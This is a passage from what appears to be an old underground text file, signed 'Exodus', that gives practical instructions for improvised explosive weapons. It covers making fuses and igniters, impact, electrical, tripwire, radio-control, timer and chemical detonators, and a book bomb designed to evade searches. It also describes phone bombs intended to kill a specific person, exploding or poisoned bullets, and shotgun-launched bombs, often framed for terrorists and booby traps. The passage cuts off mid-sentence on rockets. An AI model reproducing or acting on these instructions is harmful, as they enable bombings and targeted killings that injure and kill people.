     KEEP IT MOVING CONSTANTLY. It looks like you're smoking or on fire."

       Editor's Note:   Dry ice can be a lot of fun, but be forewarned:

    Using anything but plastic to contain dry ice bombs is suicidal.  Dry ice
is more dangerous than TNT, because it's extremely unpredictable.  Even a
2-liter bottle can produce some nasty shrapnel:  One source tells me that he
caused an explosion with a 2-liter bottle that destroyed a metal garbage can.
In addition, it is rumored that several kids have been killed by shards of
glass resulting from the use of a glass bottle. For some reason, dry ice bombs
have become very popular in the state of Utah. As a result, dry ice bombs have
been classified as infernal devices, and possession is a criminal offense.



                                   A classic for the Book..
                                           -= Exodus =-   '94
  IGNITION DEVICES

     There are many ways to ignite explosive devices.  There is the classic
"light the fuse, throw the bomb, and run" approach, and there are sensitive
mercury switches, and many things in between.  Generally, electrical
detonation systems are safer than fuses, but there are times when fuses are
more appropriate than electrical systems; it is difficult to carry an
electrical detonation system into a stadium, for instance, without being
caught.  A device with a fuse or impact detonating fuze would be easier to
hide.

  FUSE IGNITION

     The oldest form of explosive ignition, fuses are perhaps the favorite
type of simple ignition system.  By simply placing a piece of waterproof fuse
in a device, one can have almost guaranteed ignition.  Modern waterproof fuse
is extremely reliable, burning at a rate of about 2.5 seconds to the inch.  It
is available as model rocketry fuse in most hobby shops, and costs about $3.00
for a nine-foot length.  Cannon Fuse is a popular ignition system for pipe
bombers because of its simplicity.  All that need be done is light it with a
match or lighter. Of course, if the Army had fuses like this, then the
grenade, which uses fuse ignition, would be very impracticle.  If a grenade
ignition system can be acquired, by all means, it is the most effective.  But,
since such things do not just float around, the next best thing is to prepare
a fuse system which does not require the use of a match or lighter, but still
retains its simplicity. One such method is described below:


     MATERIALS
     _________
     strike-on-cover type matches       electrical tape or duct tape
     waterproof fuse

1) To determine the burn rate of a particular type of fuse, simply measure a 6
   inch or longer piece of fuse and ignite it.  With a stopwatch, press the
   start button the at the instant when the fuse lights, and stop the watch
   when the fuse reaches its end.  Divide the time of burn by the length of
   fuse, and you have the burn rate of the fuse, in seconds per inch.  This
   will be shown below:

     Suppose an eight inch piece of fuse is burned, and its complete time of
    combustion is 20 seconds.

     20 seconds / 8 inches = 2.5 seconds per inch.

     If a delay of 10 seconds was desired with this fuse, divide the desired
     time by the number of seconds per inch:

     10 seconds / 2.5 seconds per inch  = 4 inches

NOTE: THE LENGTH OF FUSE HERE MEANS LENGTH OF FUSE TO THE POWDER.  SOME FUSE,
  AT LEAST AN INCH, SHOULD BE INSIDE THE DEVICE.  ALWAYS ADD THIS EXTRA INCH,
  AND PUT THIS EXTRA INCH AN INCH INTO THE DEVICE!!!

2) After deciding how long a delay is desired before the explosive device is
   to go off, add about 1/2 an inch to the premeasured amount of fuse, and cut
   it off.

3) Carefully remove the cardboard matches from the paper match case.  Do not
   pull off individual matches; keep all the matches attached to the cardboard
   base.  Take one of the cardboard match sections, and leave the other one to
   make a second igniter.

4) Wrap the matches around the end of the fuse, with the heads of the matches
   touching the very end of the fuse.  Tape them there securely, making sure
   not to put tape over the match heads.  Make sure they are very secure by
   pulling on them at the base of the assembly.  They should not be able to
   move.

5) Wrap the cover of the matches around the matches attached to the fuse,
   making sure that the striker paper is below the match heads and the striker
   faces the match heads.  Tape the paper so that is fairly tight around the
   matches. Do not tape the cover of the striker to the fuse or to the
   matches. Leave enough of the match book to pull on for ignition.


          _____________________
          \                   /
           \                 /  ------ match book cover
            \               /
             |    M|f|M ---|------- match head
             |    A|u|A    |
             |    T|s|T    |
             |    C|e|C    |
             |tapeH|.|Htape|
             |     |f|     |
             |#####|u|#####|-------- striking paper
             |#####|s|#####|
             \     |e|     /
              \    |.|    /
               \   |f|   /
                \  |u|  /
                |ta|s|pe|
                |ta|e|pe|
                   |.|
                   |f|
                   |u|
                   |s|
                   |e|
                   |.|
                   |_|

     The match book is wrapped around the matches, and is taped to itself.     
The matches are taped to the fuse.  The striker will rub against the     
matcheads when the match book is pulled.

6) When ready to use, simply pull on the match paper.  It should pull the
   striking paper across the match heads with enough friction to light them.
   In turn, the burning matcheads will light the fuse, since it adjacent to
   the burning match heads.


     HOW TO MAKE BLACKMATCH FUSE:
     ----------------------------

  Take a flat piece of plastic or metal (brass or aluminum are easy to work
with and won't rust).  Drill a 1/16th inch hole through it.  This is your die
for sizing the fuse.  You can make fuses as big as you want, but this is the
right size for the pipe bomb I will be getting to later.

   To about 1/2 cup of black powder add water to make a thin paste.  Add 1/2
teaspoon of corn starch. Cut some one foot lengths of cotton thread.  Use
cotton, not silk or thread made from synthetic fibers.  Put these together
until you have a thickness that fills the hole in the die but can be drawn
through very easily.

  Tie your bundle of threads together at one end. Separate the threads and
hold the bundle over the black powder mixture. Lower the threads with a
circular motion so they start curling onto the mixture.  Press them under with
the back of a teaspoon and continue lowering them so they coil into the paste.
Take the end you are holding and thread it through the die.  Pull it through
smoothly in one long motion.

  To dry your fuse, lay it on a piece of aluminum foil and bake it in your 250
degree oven or tie it to a grill in the oven and let it hang down.  The fuse
must be baked to make it stiff enough for the uses it will be put to later.
Air drying will not do the job.  If you used Sodium Nitrate, it will not even
dry completely at room temperatures.

Cut the dry fuse with sissors into 2 inch lengths and store in an air tight
container.  Handle this fuse carefuly to avoid breaking it.  You can also use
a firecracker fuse if you have any available.  The fuses can usually be pulled
out without breaking.  To give yourself some running time, you will be
extending these fuses (blackmatch or firecracker fuse) with sulfured wick.

    Finally, it is possible to make a relatively slow-burning fuse in the
home. By dissolving about one teaspoon of black powder in about 1/4 a cup of
boiling water, and, while it is still hot, soaking in it a long piece of all
cotton string, a slow-burning fuse can be made. After the soaked string dries,
it must then be tied to the fuse of an explosive device. Sometimes, the end of
the slow burning fuse that meets the normal fuse has a charge of black powder
or gunpowder at the intersection point to insure ignition, since the
slow-burning fuse does not burn at a very high temperature.

 A similar type of slow fuse can be made by taking the above mixture of
boiling water and black powder and pouring it on a long piece of toilet paper.
The wet toilet paper is then gently twisted up so that it resembles a
firecracker fuse, and is allowed to dry.


                       HOW TO MAKE SULFURED WICK
                       -------------------------


   Use heavy cotton string about 1/8th inch in diameter.  You can find some at
a garden supply for tieing up your tomatoes.  Be sure it's cotton.  You can
test it by lighting one end.  It sould continue to burn after the match is
removed and when blown out will have a smoldering coal on the end.  Put some
sulfur in a small container like a small pie pan and melt it in the oven at
250 degrees.

    It will melt into a transparent yellow liquid.  If it starts turning
brown, it is too hot.  Coil about a one foot length of string into it.  The
melted sulfur will soak in quickly.  When saturated, pull it out and tie it up
to cool and harden.

  It can be cut to desired lengths with sissors.  2 inches is about right.
These wicks will burn slowly with a blue flame and do not blow out easily in a
moderate wind. They will not burn through a hole in a metal pipe, but are
great for extending your other fuse.  They will not throw off sparks.
Blackmatch generates sparks which can ignite it along its length causing
unpredictable burning times.


--IMPACT IGNITION

     Impact ignition is an excellent method of ignition for spontaneous
terrorist activities.  The problem with an impact-detonating device is that it
must be kept in a very safe container so that it will not explode while being
transported to the place where it is to be used.  This can be done by having a
removable impact initiator.

     The best and most reliable impact initiator is one that uses factory made
initiators or primers. A no. 11 cap for black powder firearms is one such
primer. They usually come in boxes of 100, and cost about $2.50. To use such a
cap, however, one needs a nipple that it will fit on. Black powder nipples are
also available in gun stores. All that a person has to do is ask for a package
of nipples and the caps that fit them.  Nipples have a hole that goes all the
way through them, and they have a threaded end, and an end to put the cap on.
A cutaway of a nipple is shown below:


                          ________________
                         |                |
                _        |                |
               | |       |/\/\/\/\/\/\/\/\|
        _______| |^^^^^^^|
       |      ___________|
       |     |
no. 11       |_______|
percussion    _______                       ------- threads for screwing
    cap              :
    here     |__________                              nipple onto bomb
       |____            |
            | |^^^^^^^^^|
            |_|         |/\/\/\/\/\/\/\/\/|
                        |                 |
                        |_________________|


     When making using this type of initiator, a hole must be drilled into
whatever container is used to make the bomb out of. The nipple is then screwed
into the hole so that it fits tightly. Then, the cap can be carried and placed
on the bomb when it is to be thrown. The cap should be bent a small amount
before it is placed on the nipple, to make sure that it stays in place.  The
only other problem involved with an impact detonating bomb is that it must
strike a hard surface on the nipple to set it off. By attaching fins or a
small parachute on the end of the bomb opposite the primer, the bomb, when
thrown, should strike the ground on the primer, and explode. Of course, a bomb
with mercury fulminate in each end will go off on impact regardless of which
end it strikes on, but mercury fulminate is also likely to go off if the
person carrying the bomb is bumped hard.


---MAGICUBE IGNITOR

      A VERY SENSITIVE and reliable impact iniator can be  produced from the
common MAGICUBE ($2.40 for 12) type flashbulbs. Simply crack the plastic
cover off, remove the reflector, and you will see 4 bulbs, each of which has
a small metal rod holding it in place.

     CAREFULLY grasp this rod with a pair of needle-nose pliers, and pry gently
upwards, making sure that NO FORCE IS APPLIED TO THE GLASS BULB.

     Each bulb is coated with plastic, which must be removed for them to be
effective in our application. This coating can be removed by soaking the
bulbs in a small glass of acetone for 30-45 minutes, at which point the
plastic can be easily peeled away.

     The best method to use these is to dissolve some nitrocellulose based
smokeless powder in acetone and/or ether, forming a thich glue-like paste.
Coat the end of the fuse with this paste, then stick the bulb (with the metal
rod facing out) into the paste. About half the bulb should be completely
covered, and if a VERY THIN layer of nitrocellulose is coated over the
remainder then ignition should be very reliable.

     To insure that the device lands with the bulb down, a small streamer
can be attached to the opposite side, so when it is tossed high into the air
the appropriate end will hit the ground first.


---ELECTRICAL IGNITION

     Electrical ignition systems for detonation are usually the safest and
most reliable form of ignition. Electrical systems are ideal for demolition
work, if one doesn't have to worry so much about being caught. With two spools
of 500 ft of wire and a car battery, one can detonate explosives from a
"safe", comfortable distance, and be sure that there is nobody around that
could get hurt. With an electrical system, one can control exactly what time a
device will explode, within fractions of a second. Detonation can be aborted
in  less than a second's warning, if a person suddenly walks by the detonation
sight, or if a police car chooses to roll by at the time. The two best
electrical igniters are military squibs and model rocketry igniters. Blasting
caps for construction also work well. Model rocketry igniters are sold in
packages of six, and cost about $1.00 per pack. All that need be done to use
them is connect it to two wires and run a current through them. Military
squibs are difficult to get, but they are a little bit better, since they
explode when a current is run through them, whereas rocketry igniters only
burst into flame. Most squibs will NOT detonate KClO3/petroleum jelly or RDX.
This requires a blasting cap type detonation in most cases.  There are,
however, military explosive squibs which will do the job.

Igniters can be used to set off black powder, mercury fulminate, or guncotton,
which in turn, can set of a high order explosive.


---HOW TO MAKE AN ELECTRIC FUZE    (By Capt. Hack & GW)

   Take a flashlight bulb and place it glass tip down on a file.  Grind it
down on the file until there is a hole in the end. Solder one wire to the case
of the bulb and another to the center conductor at the end.  Fill the bulb
with black powder or powdered match head. One or two flashlight batteries will
heat the filament in the bulb causing the powder to ignite.


---ANOTHER ELECTRIC FUZE

    Take a medium grade of steel wool and pull a strand out of it.  Attach it
to the ends of two pieces of copper wire by wrapping it around a few turns and
then pinch on a small piece of solder to bind the strand to the wire. You want
about 1/2 inch of steel strand between the wires.  Number 18 or 20 is a good
size wire to use.
     Cut a 1/2 by 1 inch piece of cardboard of the type used in match covers.
Place a small pile of powdered match head in the center and press it flat.
place the wires so the steel strand is on top of and in contact with the
powder. Sprinkle on more powder to cover the strand.
     The strand should be surounded with powder and not touching anything else
except the wires at its ends. Place a piece of blackmatch in contact with the
powder.  Now put a piece of masking tape on top of the lot, and fold it under
on the two ends.  Press it down so it sticks all around the powder.
      The wires are sticking out on one side and the blackmatch on the other.
A single flashlight battery will set this off.

---ELECTRO-MECHANICAL IGNITION

     Electro-mechanical ignition systems are systems that use some type of
mechanical switch to set off an explosive charge electrically.  This type of
switch is typically used in booby traps or other devices in which the person
who places the bomb does not wish to be anywhere near the device when it
explodes. Several types of electro-mechanical detonators will be discussed

---Mercury Switches

     Mercury switches are a switch that uses the fact that mercury metal
conducts electricity, as do all metals, but mercury metal is a liquid at room
temperatures. A typical mercury switch is a sealed glass tube with two
electrodes and a bead of mercury metal. It is sealed because of mercury's
nasty habit of giving off brain-damaging vapors. The diagram below may help to
explain a mercury switch.


                         ______________
                     A  /              \   B
      _____wire +______/_________       \
                       \   ( Hg   )|    /
                        \ _(_Hg___)|___/
                                   |
                                   |
                            wire - |
                                   |
                                   |

     When the drop of mercury ("Hg" is mercury's atomic symbol) touches both
contacts, current flows through the switch.  If this particular switch was in
its present position, A---B, current would be flowing, since the mercury can
touch both contacts in the horizontal position.

     If, however, it was in the | position, the drop of mercury would only
touch the + contact on the A side. Current, then couldn't flow, since mercury
does not reach both contacts when the switch is in the vertical position. This
type of switch is ideal to place by a door. If it were placed in the path of a
swinging door in the verticle position, the motion of the door would knock the
switch down, if it was held to the ground by a piece if tape. This would tilt
the switch into the verticle position, causing the mercury to touch both
contacts, allowing current to flow through the mercury, and to the igniter or
squib in an explosive device.


---Tripwire Switches

     A tripwire is an element of the classic booby trap.  By placing a nearly
invisible line of string or fishing line in the probable path of a victim, and
by putting some type of trap there also, nasty things can be caused to occur.
If this mode of thought is applied to explosives, how would one use such a
tripwire to detonate a bomb.  The technique is simple.  By wrapping the tips
of a standard clothespin with aluminum foil, and placing something between
them, and connecting wires to each aluminum foil contact, an electric tripwire
can be made,  If a piece of wood attached to the tripwire was placed between
the contacts on the clothespin, the clothespin would serve as a switch.  When
the tripwire was pulled, the clothespin would snap together, allowing current
to flow between the two pieces of aluminum foil, thereby completing a circuit,
which would have the igniter or squib in it.  Current would flow between the
contacts to the igniter or squib, heat the igniter or squib, causing it it to
explode. Make sure that the aluminum foil contacts do not touch the spring,
since the spring also conducts electricity.


---Radio Control Detonators

     In the movies, every terrorist or criminal uses a radio controlled
detonator to set off explosives.  With a good radio detonator, one can be
several miles away from the device, and still control exactly when it
explodes, in much the same way as an electrical switch.  The problem with
radio detonators is that they are rather costly.  However, there could
possibly be a reason that a terrorist would wish to spend the amounts of money
involved with a RC (radio control) system and use it as a detonator.  If such
an individual wanted to devise an RC detonator, all he would need to do is
visit the local hobby store or toy store, and buy a radio controlled toy.
Taking it back to his/her abode, all that he/she would have to do is detach
the solenoid/motor that controls the motion of the front wheels of a RC car,
or detach the solenoid/motor of the elevators/rudder of a RC plane, or the
rudder of a RC boat, and re-connect the squib or rocket engine igniter to the
contacts for the solenoid/motor.  The device should be tested several times
with squibs or igniters, and fully charged batteries should be in both he
controller and the receiver (the part that used to move parts before the
device became a detonator).

---DELAYS

     A delay is a device which causes time to pass from when a device is set
up to the time that it explodes.  A regular fuse is a delay, but it would cost
quite a bit to have a 24 hour delay with a fuse.  This section deals with the
different types of delays that can be employed by a terrorist who wishes to be
sure that his bomb will go off, but wants to be out of the country when it
does.


---FUSE DELAYS

     It is extremely simple to delay explosive devices that employ fuses for
ignition.  Perhaps the simplest way to do so is with a cigarette.  An average
cigarette burns for between 8-11 minutes. The higher the "tar" and nicotine
rating, the slower the cigarette burns. Low "tar" and nicotine cigarettes burn
quicker than the higher "tar" and nicotine cigarettes, but they are also less
likely to go out if left unattended, i.e. not smoked. Depending on the wind or
draft in a given place, a high "tar" cigarette is better for delaying the
ignition of a fuse, but there must be enough wind or draft to give the
cigarette enough oxygen to burn. People who use cigarettes for the purpose of
delaying fuses will often test the cigarettes that they plan to use in advance
to make sure they stay lit and to see how long it will burn. Once a cigarettes
burn rate is determined, it is a simple matter of carefully putting a hole all
the way through a cigarette with a toothpick at the point desired, and pushing
the fuse for a device in the hole formed.



                            |=|
                            |=| ---------- filter
                            |=|
                            | |
                            | |
                            |o| ---------- hole for fuse
 cigarette ------------     | |
                            | |
                            | |
                            | |
                            | |
                            | |
                            | |
                            | |
                            | |
                            |_| ---------- light this end


---TIMER DELAYS

     Timer delays, or "time bombs" are usually employed by an individual who
wishes to threaten a place with a bomb and demand money to reveal its location
and means to disarm it.  Such a device could be placed in any populated place if
it were concealed properly.  There are several ways to build a timer delay. By
simply using a screw as one contact at the time that detonation is desired, and
using the hour hand of a clock as the other contact, a simple timer can be made.
The minute hand of a clock should be removed, unless a delay of less than an
hour is desired.

     The main disadvantage with this type of timer is that it can only be set
for a maximum time of 12 hours.  If an electronic timer is used, such as that
in an electronic clock, then delays of up to 24 hours are possible.  By
removing the speaker from an electronic clock, and attaching the wires of a
squib or igniter to them, a timer with a delay of up to 24 hours can be made.
All that one has to do is set the alarm time of the clock to the desired time,
connect the leads, and go away.  This could also be done with an electronic
watch, if a larger battery were used, and the current to the speaker of the
watch was stepped up via a transformer.  This would be good, since such a
timer could be extremely small.

 The timer in a VCR (Video Cassette Recorder) would be ideal.  VCR's can
usually be set for times of up to a week.  The leads from the timer to the
recording equipment would be the ones that an igniter or squib would be
connected to.  Also, one can buy timers from electronics stores that would be
work well.  Finally, one could employ a digital watch, and use a relay, or
electro-magnetic switch to fire the igniter, and the current of the watch
would not have to be stepped up.


---CHEMICAL DELAYS

     Chemical delays are uncommon, but they can be extremely effective in some
cases. These were often used in the bombs the Germans dropped on England. The
delay would ensure that a bomb would detonate hours or even days after the
initial bombing raid, thereby increasing the terrifying effect on the British
citizenry.

  If a glass container is filled with concentrated sulfuric acid, and capped
with several thicknesses of aluminum foil, or a cap that it will eat through,
then it can be used as a delay.  Sulfuric acid will react with aluminum foil
to produce aluminum sulfate and hydrogen gas, and so the container must be
open to the air on one end so that the pressure of the hydrogen gas that is
forming does not break the container.


                _               _
               | |             | |
               | |             | |
               | |             | |
               | |_____________| |
               | |             | |
               | |  sulfuric   | |
               | |             | |
               | |  acid       | |
               | |             | |---------- aluminum foil
               | |_____________| |           (several thicknesses)               
               |_________________|


     The aluminum foil is placed over the bottom of the container and secured
there with tape.  When the acid eats through the aluminum foil, it can be used
to ignite an explosive device in several ways.

1) Sulfuric acid is a good conductor of electricity.  If the acid that eats
   through the foil is collected in a glass container placed underneath the
   foil, and two wires are placed in the glass container, a current will be
   able to flow through the acid when both of the wires are immersed in the
   acid.

2) Sulfuric acid reacts very violently with potassium chlorate. If the acid
   drips down into a container containing potassium chlorate, the potassium
   chlorate will burst into flame.  This flame can be used to ignite a fuse,
   or the potassium chlorate can be the igniter for a thermite bomb, if some
   potassium chlorate is mixed in a 50/50 ratio with the thermite, and this
   mixture is used as an igniter for the rest of the thermite.

3) Sulfuric acid reacts with potassium permangenate in a similar way.



                                         -= Exodus =-
--FILM CANISTERS 2               (Originally By Bill)

For a relatively low shrapnel explosion, I suggest pouring it into an empty
35mm film cannister.  Poke a hole in the plastic lid for a fuse.  These
goodies make an explosion audible a mile away easily.

1) Poke the hole before putting the flash powder into the cannister.
2) Don't get any powder on the lip of the cannister.
3) Only use a very small quantity and work your way up to the desired
   result.                  
4) Do not pack the powder, it works best loose.
5) Do not grind or rub the mixture - it is friction sensitive.
6) Use a long fuse.

                                          -= Exodus =-


--BOOK BOMBS                                    Exodus


     Concealing a bomb can be extremely difficult in a day and age where
perpetrators of violence run wild.  Bags and briefcases are often searched by
authorities whenever one enters a place where an individual might intend to
set off a bomb.  One approach to disguising a bomb is to build what is called
a book bomb; an explosive device that is entirely contained inside of a book.

     Usually, a relatively large book is required, and the book must be of the
hardback variety to hide any protrusions of a bomb.  Dictionaries, law books,
large textbooks, and other such books work well.  When an individual makes a
bookbomb, he/she must choose a type of book that is appropriate for the place
where the book bomb will be placed.  The actual construction of a book bomb
can be done by anyone who possesses an electric drill and a coping saw. First,
all of the pages of the book must be glued together.  By pouring an entire
container of water-soluble glue into a large bucket, and filling the bucket
with boiling water, a glue-water solution can be made that will hold all of
the book's pages together tightly.  After the glue-water solution has cooled
to a bearable temperature, and the solution has been stirred well, the pages
of the book must be immersed in the glue-water solution, and each page must be
thoroughly soaked.

   It is extremely important that the covers of the book do not get stuck to
the pages of the book while the pages are drying. Suspending the book by both
covers and clamping the pages together in a vise works best.  When the pages
dry, after about three days to a week, a hole must be drilled into the now
rigid pages, and they should drill out much like wood. Then, by inserting the
coping saw blade through the pages and sawing out a rectangle from the middle
of the book, the individual will be left with a shell of the book's pages. The
pages, when drilled out, should look like this:

               ________________________
               | ____________________ |
               | |                  | |
               | |                  | |
               | |                  | |
               | |                  | |
               | |                  | |
               | |                  | |
               | |                  | |
               | |                  | |
               | |                  | |
               | |                  | |
               | |                  | |
               | |__________________| |
               |______________________|

                 (book covers omitted)

     This rectangle must be securely glued to the back cover of the book.
After building his/her bomb, which usually is of the timer or radio controlled
variety, the bomber places it inside the book.  The bomb itself, and whatever
timer or detonator is used, should be packed in foam to prevent it from
rolling or shifting about.  Finally, after the timer is set, or the radio
control has been turned on, the front cover is glued closed, and the bomb is
taken to its destination.



---PHONE BOMBS                                        -= Exodus =-

     The phone bomb is an explosive device that has been used in the past to
kill or injure a specific individual.  The basic idea is simple: when the
person answers the phone, the bomb explodes.  If a small but powerful high
explosive device with a squib was placed in the phone receiver, when the
current flowed through the receiver, the squib would explode, detonating the
high explosive in the person's hand.  Nasty.  All that has to be done is
acquire a squib, and tape the receiver switch down.

 Unscrew the mouthpiece cover, and remove the speaker, and connect the squib's
leads where it was. Place a high explosive putty, such as C-1 (see section
3.31) in the receiver, and screw the cover on, making sure that the squib is
surrounded by the C-1. Hang the phone up, and leave the tape in place.

  When the individual to whom the phone belongs attempts to answer the phone,
he will notice the tape, and remove it.  This will allow current to flow
through the squib.  Note that the device will not explode by merely making a
phone call; the owner of the phone must lift up the receiver, and remove the
tape.  It is highly probable that the phone will be by his/her ear when the
device explodes...

--IMPROVED PHONE BOMB          

    The above seems overly complicated to me... it would be better to rig the
device as follows:

  _________            FIRST UNPLUG THE PHONE FROM THE WALL
 /|-------|\  Wire the detonator IN LINE with the wires going to the earpiece,
 ~  |  |   ~  (may need to wire it with a relay so the detonator can receive
  @@@@@@@@    the full line power, not just the audio power to the earpiece)
 @@@@@@@@@@
 @@@@@@@@@@   Pack C4 into the phone body (NOT the handset) and plug it back
             in. When they pick up the phone, power will flow through the
             circuit to the detonator....


SPECIAL AMMUNITION FOR BLOWGUNS

     The blowgun is an interesting weapon which has several advantages. A
blowgun can be extremely accurate, concealable, and deliver an explosive or
poisoned projectile.  The manufacture of an explosive dart or projectile is
not difficult. To acquire a blowgun, please contact the editor at one of the
addresses given in the introduction.

  Perhaps the most simple design for such involves the use of a pill capsule,
such as the kind that are taken for headaches or allergies. Empty gelatin pill
capsules can be purchased from most health-food stores.  Next, the capsule
would be filled with an impact-sensitive explosive, such as mercury fulminate.
An additional high explosive charge could be placed behind the impact
sensitive explosive, if one of the larger capsules were used.

   Finally, the explosive capsule would be reglued back together, and a tassel
or cotton would be glued to the end containing the high explosive, to insure
that the impact-detonating explosive struck the target first.

 Such a device would probably be about 3/4 of an inch long, not including the
tassel or cotton, and look something like this:


                 ____________________
                /mercury |           \-----------------------              
               (fulminate|   R.D.X.   )---------------------- } tassels
                \________|___________/-----------------------


    Care must be taken- if a powerful dart went off in the blowgun, you could
easily blow the back of your head off.


 SPECIAL AMMUNITION FOR WRISTROCKETS AND SLINGSHOTS

     A modern wristrocket is a formidable weapon.  It can throw a shooter marble
about 500 ft. with reasonable accuracy.  Inside of 200 ft., it could well be
lethal to a man or animal, if it struck in a vital area.  Because of the
relatively large sized projectile that can be used in a wristrocket, the
wristrocket can be adapted to throw relatively powerful explosive projectiles.

   A small segment of aluminum pipe could be made into an impact-detonating
device by filling it with an impact-sensitive explosive material.

   Also, such a pipe could be filled with a low-order explosive, and fitted
with a fuse, which would be lit before the device was shot.  One would have to
make sure that the fuse was of sufficient length to insure that the device did
not explode before it reached its intended target.

   Finally, .22 caliber caps, such as the kind that are used in .22 caliber
blank guns, make excellent exploding ammunition for wristrockets, but they
must be used at a relatively close range, because of their light weight.


SPECIAL AMMUNITION FOR FIREARMS

     When special ammunition is used in combination with the power and
rapidity of modern firearms, it becomes very easy to take on a small army with
a single weapon. It is possible to buy explosive ammunition, but that can be
difficult to do. Such ammunition can also be manufactured in the home.  There
is, however, a risk involved with modifying any ammunition.  If the ammunition
is modified incorrectly, in such a way that it makes the bullet even the
slightest bit wider, an explosion in the barrel of the weapon will occur.  For
this reason, NOBODY SHOULD EVER ATTEMPT TO MANUFACTURE SUCH AMMUNITION.


SPECIAL AMMUNITION FOR HANDGUNS

     If an individual wished to produce explosive ammunition for his/her
handgun, he/she could do it, provided that the person had an impact-sensitive
explosive and a few simple tools.  One would first purchase all lead bullets,
and then make or acquire an impact-detonating explosive.  By drilling a hole
in a lead bullet with a drill, a space could be created for the placement of
an explosive.  After filling the hole with an explosive, it would be sealed in
the bullet with a drop of hot wax from a candle.  A diagram of a completed
exploding bullet is shown below.


                      _o_ ------------ drop of wax
                     /|*|\
                    | |*|-|----------- impact-sensitive explosive                
                    | |_| |
                    |_____|

     This hollow space design also works for putting poison in bullets.

      In many spy thrillers, an assassin is depicted as manufacturing
"exploding bullets" by placing a drop of mercury in the nose of a bullet.
Through experimentation it has been found that this will not work. Mercury
reacts with lead to form a inert silvery compound.


SPECIAL AMMUNITION FOR SHOTGUNS

     Because of their large bore and high power, it is possible to create some
extremely powerful special ammunition for use in shotguns. If a shotgun shell
is opened at the top, and the shot removed, the shell can be re-closed. Then,
if one can find a very smooth, lightweight wooden dowel that is close to the
bore width of the shotgun, a person can make several types of shotgun-launched
weapons.

   Insert the dowel in the barrel of the shotgun with the shell without the
shot in the firing chamber. Mark the dowel about six inches away from the end
of the barrel, and remove it from the barrel.

   Next, decide what type of explosive or incendiary device is to be used.
This device can be a chemical fire bottle (sect. 3.43), a pipe bomb (sect
4.42), or a thermite bomb (sect 3.41 and 4.42). After the device is made, it
must be securely attached to the dowel. When this is done, place the dowel
back in the shotgun. The bomb or incendiary device should be on the end of the
dowel.

   Make sure that the device has a long enough fuse, light the fuse, and fire
the shotgun. If the projectile is not too heavy, ranges of up to 300 ft are
possible. A diagram of a shotgun projectile is shown below:

               ____
               ||  |
               ||  |
               ||  | ----- bomb, securely taped to dowel
               ||  |
               ||__|
               || |
               || | ------- fuse
               || |
               ||
               ||
               ||
               || --------- dowel
               ||
               ||
               ||
               || --------- insert this end into shotgun
               ||
               ||

      Special "grenade-launcher blanks" should be used- use of regular blank
ammunition may cause the device to land perilously close to the user.


SPECIAL AMMUNITION FOR COMPRESSED AIR/GAS WEAPONS

     This section deals with the manufacture of special ammunition for
compressed air or compressed gas weapons, such as pump B.B guns, CO2 B.B guns,
and .22 cal pellet guns.  These weapons, although usually thought of as kids
toys, can be made into rather dangerous weapons.


SPECIAL AMMUNITION FOR B.B GUNS

     A B.B gun, for this manuscript, will be considered any type of rifle or
pistol that uses compressed air or CO2 gas to fire a projectile with a caliber
of .177, either B.B, or lead pellet. Such guns can have almost as high a
muzzle velocity as a bullet-firing rifle. Because of the speed at which a .177
caliber projectile flies, an impact detonating projectile can easily be made
that has a caliber of .177.

     Most ammunition for guns of greater than .22 caliber use primers to
ignite the powder in the bullet. These primers can be bought at gun stores,
since many people like to reload their own bullets. Such primers detonate when
struck by the firing pin of a gun. They will also detonate if they are thrown
at a hard surface at a great speed.

 Usually, they will also fit in the barrel of a .177 caliber gun. If they are
inserted flat end first, they will detonate when the gun is fired at a hard
surface. If such a primer is attached to a piece of thin metal tubing, such as
that used in an antenna, the tube can be filled with an explosive, be sealed,
and fired from a B.B gun. A diagram of such a projectile appears below:


             _____ primers _______
            |                    |
            |                    |
            |                    |
            V                    V
          ______                ______
          | ________________________ |-------------------
          | ****** explosive ******* |------------------- } tassel or          
          | ________________________ |-------------------   cotton
          |_____                _____|-------------------
                    ^
                    |
                    |
                    |_______ antenna tubing

     The front primer is attached to the tubing with a drop of super glue. The
tubing is then filled with an explosive, and the rear primer is glued on.
Finally, a tassel, or a small piece of cotton is glued to the rear primer, to
insure that the projectile strikes on the front primer.  The entire projectile
should be about 3/4 of an inch long.



SPECIAL AMMUNITION FOR .22 CALIBER PELLET GUNS

     A .22 caliber pellet gun usually is equivalent to a .22 cal rifle, at
close ranges.  Because of this, relatively large explosive projectiles can be
adapted for use with .22 caliber air rifles.  A design similar to that used in
section 5.12 is suitable, since some capsules are about .22 caliber or
smaller. Or, a design similar to that in section 5.31 could be used, only one
would have to purchase black powder percussion caps, instead of ammunition
primers, since there are percussion caps that are about .22 caliber.  A #11
cap is too small, but anything larger will do nicely.


                                        -= Exodus =-
ROCKETS AND CANNONS

     Rockets and cannon are generally thought of as heavy artillery.
Perpetrators of violence do not usually employ such devices, because they are
difficult or impossible to acquire.  They are not, however, impossible to
make. Any individual who can make or buy black powder or pyrodex can make such
things. A terrorist with a cannon or large rocket is, indeed, something to
fear.


ROCKETS

     Rockets were first developed by the Chinese several hundred years before
the myth of christ began.  They were used for entertainment, in the form of
fireworks. They were not usually used for military purposes because they were
inaccurate, expensive, and unpredictable.  In modern times, however, rockets
are used constantly by the military, since they are cheap, reliable, and have
no recoil. Perpetrators of violence, fortunately, cannot obtain military
rockets, but they can make or buy rocket engines.  Model rocketry is a popular
hobby of the space age, and to launch a rocket, an engine is required.  Estes,
a subsidiary of Damon, is the leading manufacturer of model rockets and rocket
engines.  Their most powerful engine, the "D" engine, can develop almost 12
lbs. of thrust; enough to send a relatively large explosive charge a
significant distance. Other companies, such as Centuri, produce even larger
rocket engines, which develop up to 30 lbs. of thrust.  These model rocket
engines are quite reliable, and are designed to be fired electrically.  Most
model rocket engines have three basic sections.  The diagram below will help
explain them.


     _________________________________________________________
    |_________________________________________________________| -- cardboard
     \ clay   | - - - - - - - - - - | * * * | . . . .|c|            casing
      \_______|  - - - - - - - - -  | * * * |  . . . |l|
        _______ - - - thrust - - -  | smoke | eject  |a|
      / clay  |  - - - - - - - - -  | * * * | . . . .|y|
     /________|_____________________|_______|________|_|_______
    |_________________________________________________________| -- cardboard
                                     casing


     The clay nozzle is where the igniter is inserted.  When the area labeled
"thrust" is ignited, the "thrust" material, usually a large single grain of a
propellant such as black powder or pyrodex, burns, forcing large volumes of
hot, rapidly expanding gasses out the narrow nozzle, pushing the rocket
forward.

     After the material has been consumed, the smoke section of the engine is
ignited.  It is usually a slow-burning material, similar to black powder that
has had various compounds added to it to produce visible smoke, usually black,
white, or yellow in color.  This section exists so that the rocket will be
